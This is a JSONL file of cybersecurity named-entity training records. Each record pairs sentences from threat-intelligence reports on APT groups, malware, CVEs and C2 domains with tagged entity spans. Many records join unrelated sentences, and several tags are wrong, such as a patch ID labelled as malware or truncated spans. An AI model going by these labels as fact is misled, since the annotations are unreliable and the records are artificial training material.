{"text": "Strazzere advises that consumers should look at the pedigree of mobile manufacturers and take a close look at their security track record before making a decision on what device to buy . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Unknown .", "spans": {"MALWARE: VBA2Graph": [[210, 219]]}, "info": {"id": "cyberner_stix_train_006836", "source": "cyberner_stix_train"}}
{"text": "Our data shows , on average , about three requests per hour to the drop host . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies . OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 . In the UK , Vice Society accounts for a staggering proportion of known ransomware attacks on education — almost 70 % .", "spans": {"ORGANIZATION: businesses": [[145, 155]], "ORGANIZATION: companies": [[223, 232]], "THREAT_ACTOR: OceanLotus": [[257, 267]], "THREAT_ACTOR: Vice Society": [[351, 363]], "ORGANIZATION: education": [[432, 441]]}, "info": {"id": "cyberner_stix_train_006837", "source": "cyberner_stix_train"}}
{"text": "Typical web servers and applications only require GET , POST , and HEAD .", "spans": {"TOOL: web servers": [[8, 19]]}, "info": {"id": "cyberner_stix_train_006838", "source": "cyberner_stix_train"}}
{"text": "The average user might not have the necessary skills to distinguish legitimate sites from malicious ones . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": {"ORGANIZATION: Ecuadorean military": [[167, 186]], "THREAT_ACTOR: Machete": [[239, 246]], "THREAT_ACTOR: APT38": [[263, 268]], "ORGANIZATION: financial institutions": [[319, 341]]}, "info": {"id": "cyberner_stix_train_006839", "source": "cyberner_stix_train"}}
{"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]]}, "info": {"id": "cyberner_stix_train_006840", "source": "cyberner_stix_train"}}
{"text": "This will take the user through several steps until it collects all the necessary credit card information , which will be checked online and exfiltrated to the C2 . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": {"ORGANIZATION: X-Force IRIS": [[165, 177]], "MALWARE: More_eggs backdoor": [[198, 216]], "THREAT_ACTOR: Group123": [[444, 452]]}, "info": {"id": "cyberner_stix_train_006841", "source": "cyberner_stix_train"}}
{"text": "Decoy documents – This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity .", "spans": {"TOOL: Decoy documents": [[0, 15]], "TOOL: PowerShell": [[37, 47]], "ORGANIZATION: Microsoft": [[125, 134]]}, "info": {"id": "cyberner_stix_train_006842", "source": "cyberner_stix_train"}}
{"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be more prudent against suspicious or unknown messages that have telltale signs of malware . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . The underlying hypothesis is that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": {"VULNERABILITY: CVE-2017-0144": [[280, 293]], "VULNERABILITY: CVE-2017-0145": [[298, 311]]}, "info": {"id": "cyberner_stix_train_006843", "source": "cyberner_stix_train"}}
{"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . they have been last known to employ malware in February 2016 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: employees": [[36, 45]], "ORGANIZATION: aviation industry": [[72, 89]]}, "info": {"id": "cyberner_stix_train_006844", "source": "cyberner_stix_train"}}
{"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker . First , the attacker’s mission is to disrupt an operational process rather than steal data . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": {"SYSTEM: Android": [[69, 76]], "THREAT_ACTOR: attacker’s": [[366, 376]], "ORGANIZATION: Symantec": [[447, 455]], "MALWARE: Remsec modules": [[489, 503]], "THREAT_ACTOR: Strider": [[560, 567]]}, "info": {"id": "cyberner_stix_train_006845", "source": "cyberner_stix_train"}}
{"text": "Check Point reached out to Google on September 10 , 2015 , and the app containing the malware was removed from Google Play on September 15 , 2015 . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[27, 33]], "SYSTEM: Google Play": [[111, 122]], "THREAT_ACTOR: Pitty Tiger group": [[188, 205]], "MALWARE: Microsoft Office Word document": [[234, 264]], "VULNERABILITY: CVE-2012-0158": [[307, 320]], "THREAT_ACTOR: APT10": [[423, 428]], "ORGANIZATION: businesses": [[565, 575]], "ORGANIZATION: companies": [[643, 652]]}, "info": {"id": "cyberner_stix_train_006846", "source": "cyberner_stix_train"}}
{"text": "Aside from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities . Silence try to apply new techniques and ACTs of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {"TOOL: CapturaTela": [[40, 51]], "TOOL: remote access Trojans": [[101, 122]]}, "info": {"id": "cyberner_stix_train_006847", "source": "cyberner_stix_train"}}
{"text": "This version brings back the ACCESS_SUPERUSER and READ_FRAME_BUFFER permissions . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant . On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": {"TOOL: Green Lambert": [[191, 204]], "TOOL: Blue": [[239, 243]], "TOOL: email": [[306, 311]], "ORGANIZATION: Taiwanese government": [[322, 342]], "THREAT_ACTOR: Sandworm Team": [[354, 367]], "SYSTEM: SSH server.[34": [[425, 439]], "THREAT_ACTOR: Silence": [[442, 449]], "THREAT_ACTOR: StrongPity": [[539, 549]], "SYSTEM: HTTPS": [[559, 564]], "SYSTEM: C2 communication.[36": [[583, 603]], "MALWARE: SUGARUSH": [[606, 614]], "SYSTEM: a TCP connection to its C2": [[638, 664]]}, "info": {"id": "cyberner_stix_train_006848", "source": "cyberner_stix_train"}}
{"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs . OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": {"THREAT_ACTOR: APT10": [[256, 261]], "ORGANIZATION: MSPs": [[293, 297]], "THREAT_ACTOR: OceanLotus": [[300, 310]], "ORGANIZATION: State , Local , Tribal , and Tribunal ( SLTT ) governments": [[467, 525]], "THREAT_ACTOR: LockBit": [[536, 543]], "ORGANIZATION: MS - ISAC": [[555, 564]]}, "info": {"id": "cyberner_stix_train_006849", "source": "cyberner_stix_train"}}
{"text": ") If the application hasn ’ t received instructions about the rules for processing incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": {"MALWARE: ThreeDollars delivery document": [[219, 249]], "THREAT_ACTOR: OilRig": [[287, 293]], "MALWARE: Bankshot": [[350, 358]], "ORGANIZATION: Advanced Threat Research": [[441, 465]], "ORGANIZATION: financial organizations": [[534, 557]]}, "info": {"id": "cyberner_stix_train_006850", "source": "cyberner_stix_train"}}
{"text": "These apps also had a large amount of downloads between 4 and 18 million , meaning the total spread of the malware may have reached between 8.5 and 36.5 million users . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {}, "info": {"id": "cyberner_stix_train_006851", "source": "cyberner_stix_train"}}
{"text": "For example : WireLurker installed malicious apps on non-jailbroken iPhones Six different Trojan , Adware and HackTool families launched “ BackStab ” attacks to steal backup archives of iOS and BlackBerry devices The HackingTeam ’ s RCS delivered its Spyware from infected PCs and Macs to jailbroken iOS devices and BlackBerry phones Recently , we discovered another Windows Trojan we named “ DualToy ” which side loads malicious or risky apps to both Android and iOS devices via a USB connection . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": {"MALWARE: WireLurker": [[14, 24]], "MALWARE: HackTool families": [[110, 127]], "SYSTEM: iOS": [[186, 189], [300, 303], [464, 467]], "SYSTEM: BlackBerry": [[194, 204], [316, 326]], "MALWARE: HackingTeam": [[217, 228]], "MALWARE: RCS": [[233, 236]], "SYSTEM: Windows": [[367, 374]], "MALWARE: DualToy": [[393, 400]], "SYSTEM: Android": [[452, 459]], "SYSTEM: USB": [[482, 485]], "ORGANIZATION: DeepSight": [[555, 564]], "THREAT_ACTOR: Buckeye": [[589, 596]], "ORGANIZATION: Sony Pictures Entertainment": [[806, 833]], "ORGANIZATION: Novetta": [[887, 894]]}, "info": {"id": "cyberner_stix_train_006852", "source": "cyberner_stix_train"}}
{"text": "Using names as keywords is an identical technique to that of the data structure logic previously documented by 360 ’s blog post .", "spans": {"ORGANIZATION: 360": [[111, 114]]}, "info": {"id": "cyberner_stix_train_006853", "source": "cyberner_stix_train"}}
{"text": "In addition to the large number of Zebrocy attacks we discovered , we also observed instances of the Sofacy group leveraging the Dynamic Data Exchange ( DDE ) exploit technique previously documented by McAfee .", "spans": {"MALWARE: Zebrocy": [[35, 42]], "THREAT_ACTOR: Sofacy": [[101, 107]], "ORGANIZATION: McAfee": [[202, 208]]}, "info": {"id": "cyberner_stix_train_006854", "source": "cyberner_stix_train"}}
{"text": "They go on to discuss how Nymaim uses a static configuration to contact that domain , which will return IP ’s that go into a DGA and output the actual IP addresses needed for C2 communication .", "spans": {"MALWARE: Nymaim": [[26, 32]], "TOOL: C2": [[175, 177]]}, "info": {"id": "cyberner_stix_train_006855", "source": "cyberner_stix_train"}}
{"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: telecommunications": [[161, 179]], "ORGANIZATION: defense industries": [[184, 202]], "TOOL: Mozilla Firefox": [[252, 267]], "TOOL: Google Chrome": [[271, 284]], "TOOL: browsers": [[301, 309]]}, "info": {"id": "cyberner_stix_train_006856", "source": "cyberner_stix_train"}}
{"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder . Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team . The loader uses the AES128 implementation from the open-source Crypto++2 library . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"THREAT_ACTOR: APT35": [[201, 206], [263, 268]], "ORGANIZATION: news organizations": [[229, 247]], "THREAT_ACTOR: Newscaster Team": [[294, 309]], "TOOL: Crypto++2 library": [[375, 392]]}, "info": {"id": "cyberner_stix_train_006857", "source": "cyberner_stix_train"}}
{"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": {"VULNERABILITY: zero-day Adobe Flash Player exploit": [[39, 74]], "ORGANIZATION: communications": [[135, 149]], "ORGANIZATION: military": [[211, 219]]}, "info": {"id": "cyberner_stix_train_006858", "source": "cyberner_stix_train"}}
{"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file . This time , APT15 opted for a DNS based backdoor : RoyalDNS . The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore . The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": {"THREAT_ACTOR: APT15": [[213, 218]], "TOOL: DNS based backdoor": [[231, 249]], "TOOL: RoyalDNS": [[252, 260]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[297, 331]], "MALWARE: NanoCore": [[345, 353]], "MALWARE: CozyDuke": [[360, 368]], "SYSTEM: C2 server": [[437, 446]]}, "info": {"id": "cyberner_stix_train_006859", "source": "cyberner_stix_train"}}
{"text": "With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": {"MALWARE: SWAnalytics": [[24, 35]], "VULNERABILITY: CVE-2017-0144": [[223, 236]]}, "info": {"id": "cyberner_stix_train_006860", "source": "cyberner_stix_train"}}
{"text": "Ironically the decoy document is a deceptive flyer relating to the Cyber Conflict U.S. conference .", "spans": {}, "info": {"id": "cyberner_stix_train_006862", "source": "cyberner_stix_train"}}
{"text": "Through correlation of technical indicators and command and control infrastructure , FireEye assess that APT28 is probably responsible for this activity .", "spans": {"TOOL: command and control": [[48, 67]], "ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: APT28": [[105, 110]]}, "info": {"id": "cyberner_stix_train_006863", "source": "cyberner_stix_train"}}
{"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": {"VULNERABILITY: CVE-2012-0158": [[280, 293]], "TOOL: NetTraveler Trojan": [[309, 327]], "ORGANIZATION: Chinese government": [[334, 352]], "ORGANIZATION: DPP": [[386, 389]]}, "info": {"id": "cyberner_stix_train_006864", "source": "cyberner_stix_train"}}
{"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region . Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"MALWARE: ZxShell": [[396, 403]], "FILEPATH: 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335": [[460, 524]], "FILEPATH: loveusd.sys": [[571, 582]], "TOOL: Microsoft Exchange server": [[735, 760]]}, "info": {"id": "cyberner_stix_train_006865", "source": "cyberner_stix_train"}}
{"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": {"SYSTEM: Runtastic": [[0, 9], [35, 44]], "MALWARE: Marcher": [[94, 101]], "SYSTEM: Android": [[238, 245]], "ORGANIZATION: Kaspersky Lab": [[300, 313]], "VULNERABILITY: flash exploit": [[396, 409]], "VULNERABILITY: CVE-2015-5119": [[412, 425]], "VULNERABILITY: zero-day": [[583, 591]], "MALWARE: spyware": [[666, 673]], "THREAT_ACTOR: Gamma Group": [[725, 736]]}, "info": {"id": "cyberner_stix_train_006866", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "VULNERABILITY: exploit": [[228, 235]], "VULNERABILITY: CVE2017-11882": [[236, 249]], "TOOL: HTML Application": [[280, 296]], "TOOL: HTA": [[299, 302]], "TOOL: Visual Basic": [[329, 341]], "TOOL: VBS": [[344, 347]], "FILEPATH: mshta.exe": [[432, 441]]}, "info": {"id": "cyberner_stix_train_006867", "source": "cyberner_stix_train"}}
{"text": "] qwq-japan [ . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT . Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is . The script contained instructions to download and execute a second stage payload .", "spans": {"THREAT_ACTOR: APT1": [[22, 26]], "TOOL: publicly available backdoors": [[54, 82]], "TOOL: Poison Ivy": [[91, 101]], "TOOL: Gh0st RAT": [[106, 115]], "MALWARE: Glimpse": [[247, 254]]}, "info": {"id": "cyberner_stix_train_006868", "source": "cyberner_stix_train"}}
{"text": "Normally , this is considered a low-level alert easily defeated by security software .", "spans": {}, "info": {"id": "cyberner_stix_train_006869", "source": "cyberner_stix_train"}}
{"text": "However , there is also an English version of the DEFENSOR ID app ( see Figure 3 ) besides the Portuguese one , and that app has neither geographical nor language restrictions . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", "spans": {"MALWARE: DEFENSOR ID": [[50, 61]], "MALWARE: slides": [[211, 217]], "VULNERABILITY: CVE-2017-8759": [[242, 255]], "TOOL: Microsoft .NET framework": [[299, 323]], "MALWARE: RATs": [[371, 375]], "MALWARE: staging": [[380, 387]], "MALWARE: malware": [[388, 395]], "THREAT_ACTOR: Lazarus Group": [[413, 426]]}, "info": {"id": "cyberner_stix_train_006870", "source": "cyberner_stix_train"}}
{"text": "This function creates an event listener for when the SWF file is successfully loaded , which will call the ‘ onload5 ’ function .", "spans": {"TOOL: SWF": [[53, 56]]}, "info": {"id": "cyberner_stix_train_006871", "source": "cyberner_stix_train"}}
{"text": "However , all of those have been removed from Google Play – despite the fact that some of them didn ’ t contain any adware functionality . The samples we identified target the ATM vendor Diebold . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: samples": [[143, 150]], "ORGANIZATION: ATM vendor Diebold": [[176, 194]], "ORGANIZATION: McAfee": [[218, 224]], "THREAT_ACTOR: HIDDEN COBRA": [[262, 274]], "ORGANIZATION: cryptocurrency": [[295, 309]], "ORGANIZATION: financial organizations": [[314, 337]]}, "info": {"id": "cyberner_stix_train_006872", "source": "cyberner_stix_train"}}
{"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike . There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses . Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": {"ORGANIZATION: Check Point": [[6, 17]], "ORGANIZATION: Google": [[27, 33]], "SYSTEM: Play store": [[93, 103]], "TOOL: Cobalt Strike": [[253, 266]], "MALWARE: ZxShell": [[310, 317]], "SYSTEM: Cisco Secure Firewall": [[366, 387]], "SYSTEM: Next - Generation Firewall and Firepower NGFW": [[399, 444]], "SYSTEM: Threat Defense Virtual": [[466, 488]]}, "info": {"id": "cyberner_stix_train_006873", "source": "cyberner_stix_train"}}
{"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": {"ORGANIZATION: manufacturing": [[146, 159]], "ORGANIZATION: healthcare industries": [[164, 185]], "SYSTEM: Windows": [[238, 245]], "MALWARE: Octopus": [[253, 260]], "ORGANIZATION: diplomatic entities": [[281, 300]]}, "info": {"id": "cyberner_stix_train_006874", "source": "cyberner_stix_train"}}
{"text": "Based on the data available to us , Operation Soft Cell has been active since at least 2012 , though some evidence suggests even earlier activity by the threat actor against telecommunications providers . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"THREAT_ACTOR: threat actor": [[153, 165]], "ORGANIZATION: telecommunications providers": [[174, 202]], "ORGANIZATION: Government officials": [[205, 225]]}, "info": {"id": "cyberner_stix_train_006875", "source": "cyberner_stix_train"}}
{"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . According to SecureWorks , That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": {"THREAT_ACTOR: APT38": [[124, 129]], "ORGANIZATION: financial institutions": [[251, 273]], "ORGANIZATION: SecureWorks": [[373, 384]], "ORGANIZATION: Biderman": [[411, 419]], "ORGANIZATION: anti - Semitic and far - right groups": [[497, 534]]}, "info": {"id": "cyberner_stix_train_006876", "source": "cyberner_stix_train"}}
{"text": "When the family ceases to exist a new one is already available to fill the void , proving that the demand for such malware is always present and that therefore Cerberus has a good chance to survive . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"MALWARE: Cerberus": [[160, 168]], "ORGANIZATION: ESET": [[254, 258]], "MALWARE: WHITEOUT": [[410, 418]], "MALWARE: Contopee": [[425, 433]], "THREAT_ACTOR: APT38": [[460, 465]], "ORGANIZATION: bank": [[523, 527]]}, "info": {"id": "cyberner_stix_train_006877", "source": "cyberner_stix_train"}}
{"text": "Once we reached the non-secured database , we were able to directly observe the app ’ s malicious behavior . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: Turla": [[109, 114]], "ORGANIZATION: military": [[209, 217]], "THREAT_ACTOR: HIDDEN COBRA actors": [[220, 239]], "MALWARE: external tool": [[247, 260]], "MALWARE: dropper": [[264, 271]], "MALWARE: FALLCHILL": [[287, 296]], "MALWARE: malware": [[297, 304]]}, "info": {"id": "cyberner_stix_train_006878", "source": "cyberner_stix_train"}}
{"text": "During the provisioning process , PLATINUM could select whichever username and password they wish . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": {"THREAT_ACTOR: PLATINUM": [[34, 42]], "TOOL: emails": [[173, 179]]}, "info": {"id": "cyberner_stix_train_006879", "source": "cyberner_stix_train"}}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[81, 86]], "MALWARE: Ismdoor RAT": [[218, 229]]}, "info": {"id": "cyberner_stix_train_006880", "source": "cyberner_stix_train"}}
{"text": "The threat group appears to have developed its own remote access tools that it uses alongside publicly available remote access and post-compromise toolsets .", "spans": {}, "info": {"id": "cyberner_stix_train_006881", "source": "cyberner_stix_train"}}
{"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one . These types of approaches are not uncommon historically , groups have done things like provide \" security reports \" to compromised organizations to help them \" resolve the issue . \"", "spans": {"THREAT_ACTOR: Tropic Trooper": [[112, 126]], "VULNERABILITY: CVE-2012-0158": [[152, 165]], "TOOL: VMProtected": [[219, 230]], "MALWARE: ShadowPad": [[250, 259]], "MALWARE: PortReuse backdoor": [[282, 300]], "MALWARE: skip-2.0": [[305, 313]]}, "info": {"id": "cyberner_stix_train_006882", "source": "cyberner_stix_train"}}
{"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: APT32’s": [[159, 166]], "TOOL: emails": [[227, 233]], "MALWARE: Winnti installer": [[236, 252]]}, "info": {"id": "cyberner_stix_train_006883", "source": "cyberner_stix_train"}}
{"text": "They tend to target any antivirus protections on the device and uninstall them , which increases the possibility of their malware persisting on the device . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . The Carbanak attacks targeting over a 100 financial institutions worldwide .", "spans": {"THREAT_ACTOR: attackers": [[161, 170]], "ORGANIZATION: banks": [[256, 261]], "ORGANIZATION: financial institutions": [[306, 328]]}, "info": {"id": "cyberner_stix_train_006884", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 06.2017.docx .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "FILEPATH: 06.2017.docx": [[159, 171]]}, "info": {"id": "cyberner_stix_train_006885", "source": "cyberner_stix_train"}}
{"text": "The stage 2 payload was PlugX that beaconed to C&C servers www.icefirebest.com and www.icekkk.net .", "spans": {"MALWARE: PlugX": [[24, 29]], "TOOL: C&C": [[47, 50]], "DOMAIN: www.icefirebest.com": [[59, 78]], "DOMAIN: www.icekkk.net": [[83, 97]]}, "info": {"id": "cyberner_stix_train_006886", "source": "cyberner_stix_train"}}
{"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"TOOL: Leader": [[144, 150]], "TOOL: Bookworm": [[154, 162]], "MALWARE: DLLs": [[258, 262]], "VULNERABILITY: CVE-2017-8759": [[325, 338]]}, "info": {"id": "cyberner_stix_train_006887", "source": "cyberner_stix_train"}}
{"text": "After that , CosmicDuke and the second malware operate entirely independently of each other , including separately contacting their C&C servers .", "spans": {"MALWARE: CosmicDuke": [[13, 23]], "TOOL: C&C": [[132, 135]]}, "info": {"id": "cyberner_stix_train_006888", "source": "cyberner_stix_train"}}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "THREAT_ACTOR: Turla": [[173, 178]]}, "info": {"id": "cyberner_stix_train_006889", "source": "cyberner_stix_train"}}
